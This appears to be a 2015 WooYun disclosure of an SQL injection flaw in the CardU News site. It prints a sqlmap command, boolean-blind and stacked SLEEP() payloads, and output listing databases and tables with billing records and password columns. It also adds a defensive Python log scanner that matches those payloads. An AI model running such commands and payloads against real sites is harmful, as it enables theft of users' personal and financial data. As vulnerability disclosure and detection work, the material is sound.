
Vulnerability Summary

Defect ID: wooyun-2015-0152988

Title: SQL injection at one location on 卡優新聞網 (CardU News), leaking more than 10 million billing detail records and more than 80,000 user records (Taiwan)

Vendor: 卡優新聞網 (CardU News)

Author: 路人甲

Submitted: 2015-11-09 14:22

Fixed: 2015-12-16 06:19

Published: 2015-12-16 06:19

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner (HITCON Taiwan vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-09: Details sent to the vendor, awaiting vendor action
2015-11-12: Vendor confirmed; details disclosed to the vendor only
2015-11-22: Details disclosed to core white hats and relevant domain experts
2015-12-02: Details disclosed to regular white hats
2015-12-12: Details disclosed to intern white hats
2015-12-16: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

卡優新聞網 (CardU News, CardU.com.tw) officially launched in February 2006. It is primarily an information platform for the various cards consumers use in daily life (credit cards, debit cards, stored-value cards, membership cards and other consumer-related cards). From a professional news angle it reports on finance, personal finance, banking, consumer affairs, lifestyle, entertainment, arts and culture, leisure, 3C and more, and combines real-time news, deal information, data search, comparison and analysis, market surveys and community discussion into value-added services, making CardU News a professional "卡優.卡油.卡友" information service platform.

Because online media has become the second-largest mass medium after television, its reach and influence will keep growing as usage expands and habits form, making it the most closely watched medium. CardU News is now not only the card information service site consumers rely on most; the card information and deals issued by banks and merchants can all be found in CardU's four services (卡資訊, 卡好康, 優商店, 優情報), including promotional activities, product information, and bank and merchant profiles. This has made CardU News a complete information integration platform linking consumers, merchants and banks.

Detailed description:

URL: http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830

python sqlmap.py -u "http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830" -p nt_pk --technique=BS --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


1. Billing details (1771874+1767203+1758225+1729774+1651222+1368560+1336482+48291+43959+38960=11514550 rows)

Database: carduweb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| my_billing_detail | 1771874 |
| my_billing_detail_20150211 | 1767203 |
| msg_bank_card | 1758225 |
| my_billing_detail_20141028 | 1729774 |
| my_billing_detail_20140909 | 1651222 |
| my_billing_detail_20131220 | 1368560 |
| my_billing_detail_20131129 | 1336482 |
| my_billing_20141107 | 48291 |
| my_billing | 43959 |
| my_billing_20141127 | 38960 |


2. User information (84559+82758+78486+78467+78431+21474=424175 rows)

Database: carduadm
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mng_userlog | 21474 |
| user_data | 84559 |
| user_data_20150531 | 82758 |
| user_data_20140506 | 78486 |
| user_data_20140505 | 78467 |
| user_data_20140502 | 78431 |

Proof of vulnerability:

---
Parameter: nt_pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nt_pk=5 AND 5182=5182&ns_pk=27830
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: nt_pk=5;(SELECT * FROM (SELECT(SLEEP(5)))dmiJ)#&ns_pk=27830
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
current user: '[email protected].%'
current user is DBA: False
database management system users [1]:
[*] 'stwinadm'@'192.168.88.%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nt_pk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nt_pk=5 AND 5182=5182&ns_pk=27830
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: nt_pk=5;(SELECT * FROM (SELECT(SLEEP(5)))dmiJ)#&ns_pk=27830
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0.11
Database: carduadm
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mng_userlog | 21474 |
| mng_prog_control | 2071 |
| mng_user_menu | 605 |
| mng_menu | 129 |
| mng_user_group | 64 |
| mng_user | 43 |
| mng_user_20130914 | 28 |
| mng_user_group_email | 12 |
| selectitem | 6 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3381 |
| STATISTICS | 590 |
| TABLES | 270 |
| PARTITIONS | 269 |
| KEY_COLUMN_USAGE | 261 |
| GLOBAL_STATUS | 249 |
| SESSION_STATUS | 249 |
| GLOBAL_VARIABLES | 241 |
| SESSION_VARIABLES | 241 |
| TABLE_CONSTRAINTS | 220 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130 |
| COLLATIONS | 129 |
| SCHEMA_PRIVILEGES | 54 |
| CHARACTER_SETS | 36 |
| PLUGINS | 7 |
| ENGINES | 5 |
| SCHEMATA | 4 |
| PROCESSLIST | 2 |
| USER_PRIVILEGES | 1 |
| VIEWS | 1 |
+---------------------------------------+---------+
Database: carduweb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| my_billing_detail | 1771874 |
| my_billing_detail_20150211 | 1767203 |
| msg_bank_card | 1758225 |
| my_billing_detail_20141028 | 1729774 |
| my_billing_detail_20140909 | 1651222 |
| my_billing_detail_20131220 | 1368560 |
| my_billing_detail_20131129 | 1336482 |
| benfit_store_info | 348187 |
| content_rank_log | 336515 |
| benfit_store_info_20150123 | 271643 |
| content_rank_main | 157384 |
| user_data | 84559 |
| user_data_20150531 | 82758 |
| user_data_20140506 | 78486 |
| user_data_20140505 | 78467 |
| user_data_20140502 | 78431 |
| store_tag_pair | 60802 |
| provide_news_log | 59211 |
| facebook_literary | 58089 |
| credit_interest_content | 48729 |
| my_billing_20141107 | 48291 |
| my_billing | 43959 |
| my_billing_20141127 | 38960 |
| news_extends | 36680 |
| evt_userlogin_bonus_0602_001 | 31595 |
| my_billing_20131128 | 31383 |
| news | 26849 |
| message | 26798 |
| news_tag_pair | 26215 |
| message_20140220 | 20430 |
| news_20131017 | 19912 |
| message_20131016 | 19161 |
| my_billing_detail_20141126_01 | 19037 |
| store_info | 18852 |
| store_info_20150202 | 18664 |
| store_info_20141229 | 18623 |
| facebook_literary_convall | 18602 |
| store_info_20141216 | 18591 |
| store_info_20131107 | 17680 |
| news_bank | 11804 |
| benfit_reason | 10287 |
| my_billing_20141107_01 | 10258 |
| benfit | 9892 |
| news_store_info | 9757 |
| my_favorite | 9748 |
| msg_reason | 9699 |
| msg_store_info | 8387 |
| benfit_20141128 | 7011 |
| credit_card_pref | 6222 |
| store_products_photo_new | 3934 |
| member_get_member | 3866 |
| news_type_tag | 3861 |
| user_invitation | 3588 |
| my_billing_detail_history | 3275 |
| benfit_bank | 3058 |
| facebook_literary_conv | 3052 |
| products_tag_pair_new | 2901 |
| benfit_20131025 | 2631 |
| credit_card_func | 2560 |
| credit_card | 2505 |
| store_verify_log | 2446 |
| store_cross_service | 2308 |
| news_use_tag | 2186 |
| credit_card_attr | 2055 |
| store_products_store_new | 2022 |
| forward_log | 1991 |
| benfit_store_info_history | 1720 |
| consume_log | 1640 |
| my_subscription | 1613 |
| products_tag_pair | 1579 |
| evt_userbirthday_bonus_0605_001 | 1184 |
| my_calendar | 1099 |
| addr_book | 1084 |
| store_products_photo | 1082 |
| store_products | 1022 |
| store_products_new | 997 |
| evt_cardnu_game_2015pie_001 | 725 |
| store_type_tag | 663 |
| store_products_photo_20131107 | 596 |
| web_manage_count | 596 |
| store_use_tag | 584 |
| discuss | 562 |
| store_products_20131107 | 555 |
| invitation_template | 484 |
| service_question_manage | 435 |
| recommed | 434 |
| web_count | 403 |
| city_town | 388 |
| city_town_vw | 366 |
| my_info_order | 333 |
| evt_userchgdata_bonus_0602_001 | 247 |
| news_org | 230 |
| news_history | 211 |
| consume_category | 190 |
| event_activity_status | 169 |
| message_history | 167 |
| store_info_history | 158 |
| benfit_tag_pair | 156 |
| my_billing_20141107_temp | 155 |
| cc_store_info | 144 |
| preferential_tag_pair_new | 143 |
| debit_interest_content | 138 |
| project | 137 |
| evt_cardnu_game_2015pie_002 | 134 |
| benfit_history | 131 |
| products_tag_pair_new_history | 118 |
| preferential_tag_pair | 117 |
| store_products_photo_new_history | 116 |
| store_products_store_new_history | 116 |
| web_notify | 116 |
| evt_cardnu_game_2014pie_001 | 112 |
| products_tag_pair_history | 110 |
| store_products_history | 109 |
| selectitem | 106 |
| service_question_manage_20130914 | 105 |
| store_products_photo_history | 100 |
| benfit_type_tag | 85 |
| service_question_manage_history | 85 |
| mng_user | 84 |
| store_claim | 76 |
| prepaid_card_func | 74 |
| store_type | 69 |
| benfit_use_tag | 68 |
| my_friends | 68 |
| store_type_20131107 | 68 |
| pc_store_info | 67 |
| prepaid_card_pref | 67 |
| debit_card | 65 |
| store_preferential_photo_new | 64 |
| discuss_history | 63 |
| store_special_tag_pair | 59 |
| store_member_company | 58 |
| benfit_type_20131025 | 55 |
| store_preferential_photo | 55 |
| prepaid_card_attr | 54 |
| store_special_prod_pair | 52 |
| debit_card_pref | 50 |
| store_preferential_store_new | 50 |
| debit_card_func | 49 |
| preferential_tag_pair_new_history | 47 |
| store_preferential_photo_new_history | 47 |
| store_preferential_store_new_history | 47 |
| preferential_tag_pair_history | 46 |
| store_claim_history | 46 |
| store_preferential_history | 46 |
| store_preferential_photo_history | 46 |
| bank_info | 45 |
| bank_info_20140411 | 44 |
| store_preferential | 41 |
| store_member | 39 |
| credit_interest | 37 |
| msg_type | 34 |
| benfit_type_history | 33 |
| event_manage | 33 |
| card_org_level | 31 |
| edm_manage_sendemail | 31 |
| news_type | 30 |
| event_activity | 27 |
| my_message | 27 |
| prepaid_card | 27 |
| prepaid_card_level | 25 |
| benfit_org | 24 |
| benfit_type | 24 |
| debit_interest | 24 |
| msg_type_20131016 | 22 |
| store_dm_store_new | 22 |
| evt_cardnu_game_2014pie_002 | 21 |
| store_type_special_20131107 | 21 |
| card_func_img | 20 |
| member_card_func | 18 |
| news_type_20131112 | 18 |
| store_type_special | 18 |
| member_card_pref | 16 |
| bank_doc | 12 |
| card_level | 12 |
| card_org | 12 |
| member_card_attr | 12 |
| member_interest | 12 |
| prepaid_interest_content | 12 |
| store_dm | 12 |
| card_pref_img | 11 |
| store_dm_new | 11 |
| store_preferential_photo_20131107 | 10 |
| debit_card_level | 9 |
| store_member_history | 9 |
| store_preferential_new | 9 |
| store_score_log | 9 |
| card_attr | 8 |
| msg_type_history | 8 |
| oil_price_now | 8 |
| oil_price_queue | 8 |
| edm_manage | 7 |
| member_card | 7 |
| member_interest_content | 7 |
| store_service_items | 7 |
| event_buy_status | 6 |
| event_exchange_status | 6 |
| prepaid_attr | 6 |
| store_products_new_history | 6 |
| prepaid_interest | 5 |
| member_attr | 4 |
| credit_card_history | 3 |
| event_buy | 3 |
| event_exchange | 3 |
| news_type_history | 3 |
| store_type_special_history | 3 |
| addr_book_group | 2 |
| edm_manage_count | 2 |
| ad_manage | 1 |
| message_error | 1 |
| store_claim_20141216 | 1 |
| store_dm_new_history | 1 |
| store_dm_store_new_history | 1 |
| store_preferential_new_history | 1 |
| user_data_history | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: carduweb
Table: user_data_20140505
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: evt_cardnu_game_2014pie_002
[2 columns]
+-----------+
| Column |
+-----------+
| pass_key |
| pass_time |
+-----------+
Database: carduweb
Table: user_data_20140506
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data_20140502
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: store_member
[2 columns]
+----------------------+
| Column |
+----------------------+
| sm_user_password |
| sm_user_password_new |
+----------------------+
Database: carduweb
Table: user_data_20150531
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: user_data_history
[2 columns]
+-----------------+
| Column |
+-----------------+
| ud_password |
| ud_password_new |
+-----------------+
Database: carduweb
Table: store_member_history
[2 columns]
+----------------------+
| Column |
+----------------------+
| sm_user_password |
| sm_user_password_new |
+----------------------+
Database: carduweb
Table: evt_cardnu_game_0604_001
[1 column]
+----------+
| Column |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_0604_002
[2 columns]
+-----------+
| Column |
+-----------+
| pass_key |
| pass_time |
+-----------+
Database: carduweb
Table: evt_cardnu_game_2015pie_002
[2 columns]
+-----------+
| Column |
+-----------+
| pass_key |
| pass_time |
+-----------+
Database: carduweb
Table: evt_cardnu_game_2015pie_001
[1 column]
+----------+
| Column |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_2014pie_001
[1 column]
+----------+
| Column |
+----------+
| pass_key |
+----------+
Database: carduweb
Table: evt_cardnu_game_0604_001
[0 entries]
+----------+
| pass_key |
+----------+

Suggested fix:

Deploy a WAF.
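Whatever sits in front of detail.php, a WAF or a log-review job, has to recognise the two payload shapes the proof above shows: a boolean tautology appended to nt_pk, and a stacked query with a SLEEP() delay. The following Python check is an added example, not part of the report; it scans constructed Apache-style access-log lines (placeholder client IPs) for those shapes and for non-integer values in id-style parameters, and the parameter list {nt_pk, ns_pk} is assumed from the reported URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the report); lines 2 and 3 carry the two
# payload shapes from the sqlmap proof, URL-encoded as a real log records them.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Nov/2015:14:20:01 +0800] "GET /news/detail.php?nt_pk=5&ns_pk=27830 HTTP/1.1" 200 8122
10.0.0.5 - - [09/Nov/2015:14:20:02 +0800] "GET /news/detail.php?nt_pk=5%20AND%205182%3D5182&ns_pk=27830 HTTP/1.1" 200 8122
10.0.0.5 - - [09/Nov/2015:14:20:09 +0800] "GET /news/detail.php?nt_pk=5%3B(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))dmiJ)%23&ns_pk=27830 HTTP/1.1" 200 8122
10.0.0.7 - - [09/Nov/2015:14:21:00 +0800] "GET /news/detail.php?nt_pk=7&ns_pk=100 HTTP/1.1" 200 6001
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signatures for the two techniques in the proof: a boolean tautology appended
# to a numeric parameter, and a stacked query carrying a SLEEP() delay probe.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "stacked-sleep": re.compile(r";\s*\(?\s*SELECT\b.*\bSLEEP\s*\(", re.I | re.S),
}

# Parameters the application only ever needs as integers (assumed from the URL).
INT_PARAMS = {"nt_pk", "ns_pk"}

def classify_request(target):
    """Return (param, technique) for the first suspicious parameter, else None."""
    # parse_qsl percent-decodes values, so signatures match the decoded payload.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in INT_PARAMS and value.isdigit():
            continue  # a well-formed integer cannot carry either payload
        for technique, pattern in SIGNATURES.items():
            if pattern.search(value):
                return name, technique
        if name in INT_PARAMS:
            return name, "non-integer"  # cheap, high-signal check for id-style params
    return None

def scan_log(text):
    """Return a list of (line_no, client_ip, param, technique) for flagged lines."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict:
            hits.append((line_no, line.split(" ", 1)[0]) + verdict)
    return hits
```

Decoding the query string before matching matters because the payloads reach the log percent-encoded, and a pattern applied to the raw line would miss them.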

Copyright notice: please credit 路人甲@乌云 (WooYun) as the source when reposting.


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-11-12 19:15

Vendor reply:

Thank you for the report.

Latest status:

2015-12-16: Fixed